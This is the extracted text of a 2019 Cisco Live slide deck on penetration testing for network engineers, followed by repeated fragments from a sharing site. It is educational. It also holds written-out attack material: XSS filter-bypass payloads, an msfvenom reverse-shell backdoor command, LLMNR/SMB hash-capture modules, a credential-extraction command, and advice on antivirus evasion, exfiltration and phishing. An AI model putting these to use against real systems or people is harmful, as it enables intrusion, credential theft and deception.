Brksec 2013

#CLMEL
Penetration Testing
For Network
Engineers
Know Yourself and Enemy, Need Not
Fear 100 Battles
Joseph Muniz – Architect Americas
BRKSEC-2013
#CLMEL
Cisco Webex Teams
Questions?
Use Cisco Webex Teams (formerly Cisco Spark)
to chat with the speaker after the session
How
1 Open the Cisco Events Mobile App
2 Find your desired session in the “Session Scheduler”
3 Click “Join the Discussion”
4 Install Webex Teams or go directly to the team space
5 Enter messages/questions in the team space
cs.co/ciscolivebot#BRKSEC-2013
© 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 3
#CLMEL BRKSEC-2013 © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public 4
Cat And Mouse Game
Time
Powershell
Computer Internet Browser IoT
OS Browser Plugins Phishing
Etc.
The Evolution of Ransomware Variants NotPetya
Cryptowall SamSam
WannaCry
Crysis
First 73V3N Nemucod
Keranger
CRYZI commercial TeslaCrypt Petya
Jaff
PC Fake Spora
Android phone Cryptolocker Teslacrypt 3.0 Ceber
Cyborg Antivirus Redplus Teslacrypt 4.0 Cryptomix
Virlock Teslacrypt 4.1
Lockdroid
Reveton
1989 2001 2005 2006 2007 2008 2012 2013 2014 2015 2016 2018
CryptoDefense
Koler
GPCoder QiaoZhaz Reveton Kovter Cerber
Ransomlock Simplelock Radamant
Cokri Tox Hydracrypt
Bitcoin CBT-Locker Cryptvault Rokku
TorrentLocker DMALock Jigsaw
network launched Dirty Decrypt Virlock Chimera Powerware
Cryptorbit CoinVault Hidden Tear
Cryptographic Locker Svpeng Lockscreen
Urausy Teslacrypt 2.0
Crypto-Mining
Locky
Ransomware Evolution
Threats Continue
Option 1: Hope You Are Secure
Option 2: Validate You Are Secure
• Why Use Penetration Testing
Agenda
• Penetration Testing Lab
• Testing Concepts
• Attacking Websites
• Attacking Networks
• Attacking People
• Attacking Mobile Devices
• Attacking IoT
• Reporting and Next Steps
• Conclusion
Yeay For Giveaways!
Download The CTR Comic
https://tinyurl.com/ycwt2moz
https://tinyurl.com/y6uurzuu
Joseph Muniz Technical Security Architect
Security Architect – Americas Sales Organization
Security Researcher –www.thesecurityblogger.com
Speaker: Cisco Live / DEFCON / RSA / (ISC)2
Avid Futbal (Soccer for USA people) Player and Musician
Twitter @SecureBlogger
Goals For Penetration
Testing
Cybersecurity Goals
Confidentiality = Protect sensitive data

Integrity = Ensure no unauthorised modifications
Availability = Authorised people can access it
Persistence Level
Smash n Grab – Automated attacks against anything
vulnerable.
 Not targeted
 Example Exploit Kits or SPAM
Advanced Persistent Threat – Continues and focused

attacks against a specific target
 Typically Highly orchestrated and long term attacks
 Usually executed in stealth by elite criminals
 Governments or Activism is common
Known and Unknown Threats
Known – Attack has been seen and characterised.
 Develop signatures for detection
 Behaviour triggers
 Domains blocked
 Antivirus / IPS leverage this
Unknown – Attack not known and characterised

 Signatures do not exist
 Behaviour and anomaly detection focused
 Breach detection / Sandboxing / Honeypots
Vulnerabilities
• Weakness in system
• Configuration error, missing patch, design flaw, etc.
• Signature security defend attacks (exploiting)
against vulnerabilities. Examples IPS, Anti-Virus
Common Vulnerabilities and Exposures (CVE)
Vulnerability Type: Apache vulnerability

Threat Description: Three vulnerabilities in the Apache Struts 2 package
Existing Controls: Firewalled and monitored by IPS
Probability: Unlikely (not web facing)
Impact: Critical http://cve.mitre.org/about/faqs.html
Common Vulnerability Scoring System
Consistent standard for computing vulnerability severity
Examples are version 2 and most used but version 3 is the latest
Access Vector Local (L) = 0.395 Adjacent Network (AN) = 0.646
Access Complexity High (H) = .035 Medium (M) = 0.61 Low (L) = 0.71
Multiple (M) = 0.45 Single (S) = 0.560 None (N) = 0.704

Authentication
Confidentiality None (N) = 0.00 Partial (P) = 0.275 Complete (C) = 0.66
Integrity None (N) = 0.0 Partial (P) = 0.275 Complete (C) = 0.660
Availability None (N) = 0.0 Partial (P) = 0.275 Complete (C) = 0.660
Best of Breed vs Defence in Depth
Capability
Capability Capability
Capability
OR
Malware
Joey’s Shoes
2.0
Joey’s Shoes
2.0
Vulnerability Management Current State
Recorded Threat
Signature Malicious Action

Different From
Normal Behaviour
Anomaly Behaviour
Why Tuning Matters
50% - 75% Effective Requires Tuning
Vendor Signatures Your Vulnerabilities

IPS Detection
Capabilities Enabled
Heart Bleed / General Server, Host,
Recon / Protocol Java Vuln / Exploit Kit Configuration Issues
Abuse / etc. Flash Vuln, et.
Default Detection Your Vulnerabilities
Vendor Feeds
Security Operation Centre Services
• Risk Management – Dealing with any type of risk
• Vulnerability Management – Dealing with vulnerabilities
• Incident Response – Responding to attacks
• Audit – Checking for compliance
• Digital Forensics – Investigating breaches / legal needs
• Hacking – Unlocking features / creating new
capabilities
Why First Perform a Vulnerability
Assessment Before Pentest?
Assessment vs Penetration Test
 Assessment – Using automated systems to identify potential vulnerabilities

 Penetration Test – Executing attacks against identified vulnerabilities
Assessment is good to see your weaknesses

Penetration Testing is good if you know you are
secure
Credential vs Non-Credential Scanning
Host Scan
Credential
•
• Less load on network
• Considered “Safer Scan”
• Better data
• Network scan
Credential
• Similar to attacker viewpoint (external view)

Non -
• Relies on ports to return correct information

about services running
• Potential false positives
SANS - Vulnerability Management
• NAC and Profiling can

help with Asset
Inventory
• Triggers
• CVE Identifier may
trigger event
• Assessment tools
• Audits
• NAC and Profiling can
help with Asset
Inventory
• Triggers
• CVE Identifier may
trigger event
• Assessment tools
• Audits
How to Prioritize Risk – COBIT 5 (ISACA)
Penetration Testing
Penetration Testing Starting Points
White Box Grey Box Black Box

• Know target details • Some details • No details
• Topology given • Some topology • Unknown topology
• Informed parties • Limited awareness • No awareness
• Limited attacks • Many attacks • Any attack
Very specific work Hybrid work Attack Anyway

Possible
Statement of Work
• Define target systems • Risks / Critical

• Timeframe Operation Areas
• Evaluation methods • Target space
• Tools and Software • Define flag
• Notified parties • Deliverable
• Initial access level • Expected remediation
• Authorisation • Assumptions
Get out of Jail Card
• Authorisation in writing
• Signed by the right person
• State risks
• Assign liability to
stakeholder
Make sure to have this!
Hack Back Research
Search Youtube – Muniz DEFCON 26
Attackers pivot through compromised targets

• Avoid Reputation Security
• Remain Anomalous
May be illegal
• Use same tactics as attacker!!!
• What damage can you really do?
Building A Lab
Kali Linux (Also BackBox is good)
Open Source Penetration Testing Arsenal
Many Great Forensics Tools
Download
www.kali.org
Make sure to update

Apt-get update
Apt-get upgrade
Some Linux Downloads
• Masscan – https://github.com/robertdavidgraham/Masscan.git
• Gitrob – https://github.com/michenriksen/gitrob.git
• CMSmap – https://github.com/Dionach/CMSmap
• SQLMap – https://github.com/sqlmapproject/sqlmap
• WPScan – https://github.com/wpscanteam/wpscan.git
• Responder – https://github.com/SpiderLabs/Responder.git
• Mimikatz – https://github.com/gentikiwi/mimikatz/releases/latest
• PowerSploit – https://github.com/mattifestation/PowerSploit.git
• Veil-Framework – https://github.com/Veil-Framework/Veil
• Net-Creds – https://github.com/DanMcInerney/net-creds.git
• SET – https://github.com/trustedsec/social-engineer-toolkit
Metasploit
Penetration testing tool used for executing exploit code
against a remote target machine.
Hundreds of exploits available
Search vulnerability and use MSF to deliver a packaged

attack against the weakness.
Gain shell access, disrupt target, etc.

Metaspoit / Armitage
Defense Tools are Similar
Search struts in Firepower
Why can this be bad?
Lots of signatures for

struts attacks come up
Defense Tools are Similar
Note: Ethical Security Vendors Don’t Always Tell

Search struts in Firepower
Lots of signatures for

struts attacks come up
Sandbox - Cuckoo
Malware looks for

virtualisation processes
Memory, CPU, Cores, VM

Tools, registry entries
DLL files such as sbie.dll
https://www.cuckoosandbox.org/
TrIDNET or PEiD
Honeypot
2 Public Addresses - 1 for management and 1 for honeypot

services
No NAT - Some attacker services not correctly recorded with NAT
VPS services - Lots of attacks cause termination of services
Honeypot compromises - Used to host malware and illegal

content
Clonezilla
Real malware
analysis means
bare metal
testing
VMware
Vulnerability Scanners
Credential and Non- Credential is Key
http://sourceforge.net/projects/owaspbwa/files
Metasploitable 2
Simple Lab Example
Vmware Fusion
Kali USB Internet
Option
MAC OSX
Kali
Linux
Windows 200 Gig
7 Mobile
Storage
The Process
Attack Kill Chain
Weaponise Deliver Exploit Install Command Action

&
Control
Many Targets to Consider
Servers Botnet Data Loss Multiple Alarms User

Compromised Communication Complaints
HQ
HQ
Branch Network
Users
Cloud
Data Center
Admin
Roaming Users
Vectors of an Attack
Physical Digital
• Intel Gather
• Surveil • Scan
• Pick • Assess
• Force • Exploit
• Conceal • Persist
• Persist •
Converged •
Propagate
Exfiltrate
Converged
Attack attacks are most
effective and most
Social difficult to thwart
• Targeted Phishing
• Conning Guards/Staff
• Impersonation
• Phone Phishing
• Create Spies
Physical Attacks
Keyboard Drivers System Backdoor Network Backdoor
USB Script Options
• Poison Tap or Responder – Grab

Passwords from Locked windows systems
• Reverse SSH – Encrypted tunnel off network
• Root Scripts – Gain shell
• Many many more ….
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Lock Picking
Lock Picking
Door Cards – Proxmark3
https://blog.kchung.co/rfid-hacking-with-the-proxmark-3/
Digital Attacks
NMAP shows Open Ports!
Nexpose shows vulnerabilities
Metasploit delivers attack
Digital Attacks
NMAP shows Open Ports!
Nexpose shows vulnerabilities
Metasploit delivers attack
Social Attacks
Attacking Websites
Let the fun begin …
Web Recon - Shodan.io
92% of Internet devices surveyed were running known vulnerabilities, average of 26 each
Check your scanning results against Shodan
Web Reconnaissance
• Whois – Example 215.234.43.22@whois.arin.net

• Google Hacking – intext: classifed | “this file generated
by Nessus” | intitle:index.of inbox dbx
• Wayback Machine – Find old versions of website
• Robots.txt – Websites they want hidden from spiders
• Banners – Free info about the system
• DIG – DNS info
• RECON-NG – Kali Tool
Web Reconnaissance
• Whois – Example 215.234.43.22@whois.arin.net

• Google Hacking – intext: classifed | “this file generated
by Nessus” | intitle:index.of inbox dbx
• Wayback Machine – Find old versions of website
• Robots.txt – Websites they want hidden from spiders
• Banners – Free info about the system
• DIG – DNS info
• RECON-NG – Kali Tool
Interrogate DNS
• Domain information Grouper (DIG)
Why is Auto Blocking Scanning A Bad

• DNSRecon in Kali Linux
• Mxtoolbox – web tool
Idea?
Interrogate DNS (Inside)
Find DSN Suffix in use on the domain

• Cat /etc/resolv.conf
Find list of Domain Controllers

• Nslookup
• set q=SRV
• _ldap._tcp.dc._msdcs.<example.com>
Target Fingerprinting
• ICMP Port unreachable messages
• Banners
• Binaries
• Port Signatures
• Non-standard handshakes
• Response to synfloods
• Packets with non-standard TCP/IP Flags
Tools like NMAP can do this for you

Network Mapper NMAP
• NMAP
• -sP = Network Discovery
• -sT = Host Discovery
• -sV = Service Interrogation
• -sU = UDP scanning
• -sA = Map out firewall rulesets (stateful?, Filter ports?)
• -sF = Discover closed ports
• Hping3 - Command-line oriented TCP/IP packet

assembler/analyser
Stealth / Legal
• Completing the handshake could be illegal!

• -sT = illegal | -sS = not illegal (not legal advise!)
• Syn Scan – Half open scan for stealth

• Add delay (example “--scan_delay 90000”)
• Sending ICMP traffic with different types
• Response doesn’t matter. Looking for hosts!
Save active devices to file
cat alive-scan.txt | grep "report for" | awk '{print $5}' | tee alive-IPs.txt
Open Ports … Now What?
• Determine services/daemons that are running to find

exploits! (ex nmap –sV)
• Port numbers – www.iana.org/assignments/port-numbers
• Ports can run any service! You should interrogate by
connecting to it.
• Example: telnet to a port 25
Also gather other data like Banners ->
OWASP Top 10
• Easy to get to, poor security and most vulnerable!

• OWASP – Great resource for news and standards
• Cross Site Scripting (XSS) • Information Leakage and

Improper Error Handling
• Injection Flaws
• Broken Authentication and
• Malicious File Execution Session Management
• Insecure Direct Object • Insecure Cryptographic Storage
Reference
• Insecure Communications
• Cross Site Request Forgery
• Failure to Restrict URL Access
OWASP ZAP
Bypass & Defeat XXS Filters
Mess with script
<script>alert(123)</script>
<script >alert(123)</script>
<script&#9>alert(123)</script>
<ScRipT>alert(123)</sCriPt>
<%00script>al%00ert(123)</script> Pseudo-Protocols
<a href="https://www.google.com">Click
Here</a>
Attributes and Tags
<input type="text" name="input" value=”HI">
<input type="text" name="input” value="><script>alert(1)</script>
<input onsubmit=alert(1)> --- Event Handlers

<img onerror="alert(1)"src=x> --- Try Brackets
XXSer
Summarising Web Testing
One
Three
Two
Attacking Networks
Plugging in Networks
• No security = Instant access

• Port security = Possible static MAC list
• NAC = Need to beat assessment profile
• NAC is port driven, try weird ports
Spoofing trusted devices may work
Hacking SNMP
• Default Community – public / private

• Spoof address of manager or devices
• Typically won’t notice ”quite” devices
• Brute force SNMP authentication
• Typically not monitored
• SNMP walking – Try strings across multiple systems
• SNMP brute force – Run a .txt file of strings
• SNMP attacking - Abuse when rw is enabled
Attacking SNMP
Onesixtyone – Brute Force with text file
Snmpwalk or snmp-check – Test various community strings

Public Exists Private Doesn’t
Change SNMP if RW is enabled!

Find it by grep v1
Viewing Network Data
 Inline – direct real-time live traffic

 SPAN port – copy of traffic
PCAP = Historical
Live should have filtering (example TCPDump filter on POST)
tcp.flags.syn && tcp.flags.ack==0

tcp.flags.syn==1 && tcp.flags.ack==1
tcp.flags.reset && tcp.flags.ack
=
Network MiTM
• Get network traffic through your device

• ARP poison
• Inline
• Proxy (network or host)
PacketSquirrel | Ettercap = Easy Testing
WiFi MiTM
Karma – Ability to clone SSIDs and man-in-the-middle the mobile device
SSL-Strip – Removing HTTPS request so authentication is in the clear.
Defending ????
WiFi MiTM
Karma – Ability to clone SSIDs and man-in-the-middle the mobile device
SSL-Strip – Removing HTTPS request so authentication is in the clear.
Defending
• VPN
• Disable Auto WiFi Connect
• WIDS/WIPS
• Remove HTTP from critical servers
How Easy is Getting Wireless MiTM?
WiFi Pineapple
• Wireless Pretesting Tool
• Can Spoof SSID and performan SSL-Strip
• Cost: $100 - $200 dollars from hack5
Raspberry Pi
• $35 dollar computer
• Can host any OS including Kali Linux
• Kali Linux offers multiple penetration
testing applications
How Easy is Getting Wireless MiTM?
WiFi Pineapple
• Wireless Pretesting Tool
• Can Spoof SSID and performan SSL-Strip
• Cost: $100 - $200 dollars from hack5
Raspberry Pi
• $35 dollar computer
• Can host any OS including Kali Linux
• Kali Linux offers multiple penetration
testing applications
Responder – LLMNR / NBT-NS / WPAD
NBT-NS – Microsoft left enabled for legacy / compatibility reasons

LLMNR – Similar to DNS using multicast and peer-to-peer
communication for name resolution
WPAD – Provides proxy auto-config (PAC) file to hosts looking to get
to the Internet
These broadcasting protocols can be exploited for grabbing

hashes taken during the handshake process!
auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response
auxiliary/server/capture/smb
Window - ShareCheck
• Use of non standard local admin accounts

• Windows file sharing vulnerabilities
• Global groups granted local admin acess
• Insecure account lockout
http://www.sec-1.com/blog/2014/sharecheck
Exfiltration
• Allow root remote - /etc/ssh/sshd_config, comment out

“PermitRootLogin no”
• Netcat
• Create account on exiting FTP / SSH
• Lightweight FTP – BabyFTP | Vsftpd | Mollensoft FTP
Avoid Trojans and Keyloggers – Painful Cleanup!
Attacking People
You can be anybody
Emily Williams
•Total Connections: 170 Employees,
71 Cisco; 22 NetApp; 10 EMC; 35
McAfee; 300+ Facebook friends
•Endorsements: 22 LinkedIn
Endorsements, For Expertise and
Experience; From Partners and co-
workers
•Offers: 4 job offers, Laptop and

office equipment, network access.
Speak Like Your Target
• Use Facebook and LinkedIN as a weapon

• What do you leave on social networks that could
be used against you?
• Hide attacks in Social Media messages
• Read their E-mail / Posts / Etc and learn their
language


Phishing / Spear Phishing
• Best to customize based on Recon

• Tie it to holiday / events
• Language is everything!
• Goal can be info or cause action
Practice this skill
Phishing / Spear Phishing
• Best to customize based on Recon

• Tie it to holiday / events
• Language is everything!
• Goal can be info or cause action
Practice this skill
Phishing Emails
Browser Injection Framework (BeEF)
• Hook victim browsers as beachheads for attacks
• Social engineer to click customized link
• Available attacks depend on current browser
vulnerabilities
• Can track hooked systems
#CLMEL © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public
Social Engineering Tool Kit (SET)
• Easily clone a website
• Create various phishing attacks
• Create payload and listener
• Mailer attacks
• Powershell attacks
• And many many more ….
Business Email Compromise
Attacker
john@ciscco.com: We
have conference dues to
pay that are late. Pay at
www.hackme.com/dues
Cisco Financial
bob1@cisco.com: Ok
I’m on it!
Attacking Endpoints
Packing Malware 101
Bypass signature based detection
(Un)Packer Frequently Changed
Payload
(unpacked malware) Changed Less
frequently
Executable
Weaponize: RAT vs Dropper
Dropper – Beaconing software that doesn’t provide

a full tunnel and can call back desired data
RAT – Full tunnel to compromised system
Empire – Powershell tool that can communicate

using a dropper
Metasploit – Developer meterpreters that can be
installed on victim systems
Encoding – Create Backdoor
Metasploit
msfvenom -p python/meterpreter/reverse-underscore-tcp LHOST = ANYIP
LPORT= ANY PORT R> anyname.py
Senna
Testing Encoding
• Metasploit has encoders but they are detected
• Shelter
• Veil Framework
• Building custom python or powershell connectors
Test against virus total + few antivirus venders

Even if your file is clean on VT, samples are downloaded
Vendors find zero days by checking clean files
Use your own systems to test (script and invest)
Maybe test with advanced beach detection products
Testing Encoding
• Metasploit has encoders but they are detected
• Shellter
• Veil Framework
• Building custom python or powershell connectors
Test against virus total + few antivirus venders

Even if your file is clean on VT, samples are downloaded
Vendors find zero days by checking clean files
Use your own systems to test (script and invest)
Maybe test with advanced beach detection products
Testing RATs
RATs are detected by AV

• Use PowerShell or Python framework (win or MAC)
EggShell - Python based RAT framework (MAC)

• Viralmaniar PowerShell RAT is a another example
Infects by connecting back to a public server

• Send a phishing link
• Send a uninfected file with a icon link hosted remotely
Metasploit Framework for Undetectable Malware
PowerShell Empire
• Exploit Framework targeting Windows

• Listener – Waits for connection
• Stager – Code placed on compromised system
• Agent – Maintain connection between you and
victim
• Run commands in memory.
• Antivirus hates this!
Example: Phishing Phishers (Magic land)
Step 1: Setup safe place to interact with phisher - Sandbox
Step 2: Act stupid - Talk about the matrix and blackhat movie
Step 3: Wrap sharing software with malware
Step 4: Frustrate phisher. Offer sharing software to help show why

things are not working
Privilege Escalation
• Cpasswords – Group Policy Passwords encrypted

but reversible
• GP3finder simplifies
gp3finder.py -A -t DOMAIN_CONTROLLER -u DOMAINUSER
• Mimikatz – Meterpreter password extraction
• Incognito – Enumerate and impersonate tokens
Password Cracking Concepts
• BIOS – Try manufacture password
• Guessing or Recovering a password
(admin | password | cisco | blank | vender name)
• Dictionary / Rainbow Tables
• Man-in-the-middle
• Attacking encryption
Lots of Password Cracking Tools
• Hashcat - cracking hashes tool
• RainbowCrack - Hash cracker tool, Windows/Linux based
• Wfuzz - Web application brute forcing (GET / POST), (SQL, XSS,
LDAP,etc)
• Cain and Able - Few features of password cracking ability
• John the Ripper - Offline mode, auto hash password type detector,
• THC Hydra - Dictionary attack tool for many databases, over 30
protocols
• AirCrack-NG - WEP and WPA-PSK keys cracking
• OphCrack / Medusa / L0phtCrack / Etc. ……
CeWL
Attacking Mobile
Devices
Always Research
• Mobile exploitation constantly changing

• New vulnerabilities constantly discovered
• Venders are improving patching
• Attack tools constantly improving
Attacks are not black and white – TEST!
Phones: MAC OSX
• Jailbreaking usually older iOS

• Attack iTunes Backups
• AnyTrans or iPhone Backup Extractor
• iOS Snapshots
Phones: Android
• Older - Connect to like mass storage

• Version 6 or later – Encrypted
• Root device – KingoRoot
• SMS data base
/data/data/com.android.providers.telephony/databases/mmssms.db
• Script to read SMS

SELECT datetime(date/1000,
'unixepoch','localtime') ,datetime(date_sent/1000,
'unixepoch','localtime') ,person,body
FROM sms
WHERE thread_id = 310
ORDER BY date
Example Reading SMS
+------------------------------------------------------------------------
-----------------------------------------+
| date | date_sent | person | body
|
|------------------------------------------------------------------------
------------------------------------------
| 2017-10-20 13:48:18 | 2017-10-20 13:48:16 | 54 | Hello Randy!
Where should I send my Cisco live presentation? |
| 2017-10-20 16:34:03 | 2017-01-01 02:00:00 | | Damn, thanks ! for
texting jet |
| 2017-10-20 16:40:02 | 2017-10-20 16:40:01 | 54 | Jet? When you
are a Jet, you’re a jet? West Side?? |
| Stupid auto correct! | I’m going to dropkick you Joey ... And this phone
What is Root for Android?
Models You Won’t Root
Google Pixel or Pixel XL (Verizon variant)
Google Pixel 2 or Pixel 2 XL (Verizon variant) Requires root access to modify
Samsung Galaxy S7 (US variants)
Samsung Galaxy S7 Edge (US variants)
Samsung Galaxy S8 (US variants) Root directory
Samsung Galaxy S8+ (US variants) System
Samsung Galaxy Note 8 (US variants)
Samsung Galaxy S9 (US variants)
Samsung Galaxy S9+ (US variants)
Data
Samsung Galaxy Note 9 (US variants)
SD CARD
Downloads
Good Targets
Pictures
Google Nexus 6P
OnePlus 3 or 3T Accessible by default
OnePlus 5
OnePlus 6
Google Nexus 7 (2012 or 2013)
Google Pixel or Pixel XL
Google Pixel 2 or Pixel 2XL
Brute Force PINs
• Most phones lock if brute forced

• TIP: Plug in a keyboard bypass this.
• TIP2: Rubber Ducky abuses keyboard
drivers and effective brute force tool
Many Commercial Tools Available
• Cellebrite or Elcomsoft are good but pricy!

• Know even professional tools have
limitations!
Accessing Unauthorized Voicemail
Testing IoT
Hacking IoT
Lightbulbs
Conference Blinky Things
Power plugs Cameras
Hacking IoT
Lightbulbs
Conference Blinky Things
• Micro drive or plug to access hardware

• Firmware security analysis and modification
Power plugs Cameras
• Radio- / wireless-based exploitation
• Application exploitation
• Hardware exploitation (example JTAG)
IoT Recon
• Mobile Application Downloads

• Web dashboards and resources
• Firmware or source code
• Any available APIs
• Plugs to access hard drive / removable
storage
IoT Firmware
Firmware – Code running on the hardware

(bootloader, file systems, kernel, etc.)
Many devices don’t validate firmware!
Call support for help!
IoT Hardware Hacking
• Common for unauthenticated root when

tapping into the hardware
• Identify UART or JTAG pins
• Use multimeter to find ground, transmit
and receive
• Connect to exploitation tool (ATTIFY
Badge), adjust baud rate until you can
read. Its likely to be unauthenticated.
Radio Interfaces
• Software Defined Radio

• ZigBee Exploitation
• Bluetooth
Example Attack Methods

Man-in-the-middle attack Insecure CRC verification
Replay attack Clear text
Reporting
Language is Everything
• People can be terminated

• Critical vulnerabilities could be overlooked
• Money and time could be wasted
• Choose your tone wisely
• Expect various education types to read it
• Include details (tools, time, process)
• Define acronyms
Penetration Testing Report
• Target Audience – Who will read it

• Report Classification – Could contain sensitive
information
• All information collected – Need to list everything
(notes, screenshots, etc.)
• Summary of findings
• Summary of recommendation
Penetration Testing Report - Details
 Vulnerabilities – What you found
 Impact – Potential damage
 Likelihood – How hard to execute
 Risk evaluation – Impact to business
 Recommendation – Remediation steps
 References – Who worked on what
 Additional details – Appendices, Glossary, Tools used, etc.
Example Offensive Security

https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf
Remember …. Cybersecurity Goals
Confidentiality = Protect sensitive data

Integrity = Ensure no unauthorized modifications
Availability = Authorized people can access it
•Wrap up
Threats will increase.
Volume and sophistication.
Next Steps
Security is a Journey, Not a destination
Q&A
#CLMEL
Complete Your Online Session Evaluation
• Give us your feedback and receive a

complimentary Cisco Live 2019 Power
Bank after completing the overall event
evaluation and 5 session evaluations.
• All evaluations can be completed via the
Cisco Live Melbourne Mobile App.
• Don’t forget: Cisco Live sessions will be
available for viewing on demand after the
event at:
https://ciscolive.cisco.com/on-demand-library/
#CLMEL © 2019 Cisco and/or its affiliates. All rights reserved. Cisco Public
Thank you
#CLMEL
#CLMEL

Brksec 2013

Uploaded by

Copyright:

Available Formats

You might also like

Brksec 2013

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Brksec 2013

Uploaded by

Copyright:

Available Formats

#CLMEL

Security Researcher –www.thesecurityblogger.com

Speaker: Cisco Live / DEFCON / RSA / (ISC)2

Avid Futbal (Soccer for USA people) Player and Musician

Confidentiality = Protect sensitive data

Advanced Persistent Threat – Continues and focused

Unknown – Attack not known and characterised

Vulnerability Type: Apache vulnerability

Access Vector Local (L) = 0.395 Adjacent Network (AN) = 0.646

Multiple (M) = 0.45 Single (S) = 0.560 None (N) = 0.704

Signature Malicious Action

50% - 75% Effective Requires Tuning

Vendor Signatures Your Vulnerabilities

Default Detection Your Vulnerabilities

 Assessment – Using automated systems to identify potential vulnerabilities

Assessment is good to see your weaknesses

• Similar to attacker viewpoint (external view)

• Relies on ports to return correct information

• NAC and Profiling can

White Box Grey Box Black Box

Very specific work Hybrid work Attack Anyway

• Define target systems • Risks / Critical

Make sure to have this!

Attackers pivot through compromised targets

Make sure to update

Hundreds of exploits available

Search vulnerability and use MSF to deliver a packaged

Gain shell access, disrupt target, etc.

Search struts in Firepower

Why can this be bad?

Lots of signatures for

Note: Ethical Security Vendors Don’t Always Tell

Lots of signatures for

Malware looks for

Memory, CPU, Cores, VM

DLL files such as sbie.dll

2 Public Addresses - 1 for management and 1 for honeypot

No NAT - Some attacker services not correctly recorded with NAT

VPS services - Lots of attacks cause termination of services

Honeypot compromises - Used to host malware and illegal

Credential and Non- Credential is Key

Weaponise Deliver Exploit Install Command Action

Servers Botnet Data Loss Multiple Alarms User

Keyboard Drivers System Backdoor Network Backdoor

• Poison Tap or Responder – Grab

Let the fun begin …

Check your scanning results against Shodan

• Whois – Example 215.234.43.22@whois.arin.net

• Whois – Example 215.234.43.22@whois.arin.net

• Domain information Grouper (DIG)

Why is Auto Blocking Scanning A Bad

Find DSN Suffix in use on the domain

Find list of Domain Controllers

Tools like NMAP can do this for you

• Hping3 - Command-line oriented TCP/IP packet

• Completing the handshake could be illegal!

• Syn Scan – Half open scan for stealth

• Determine services/daemons that are running to find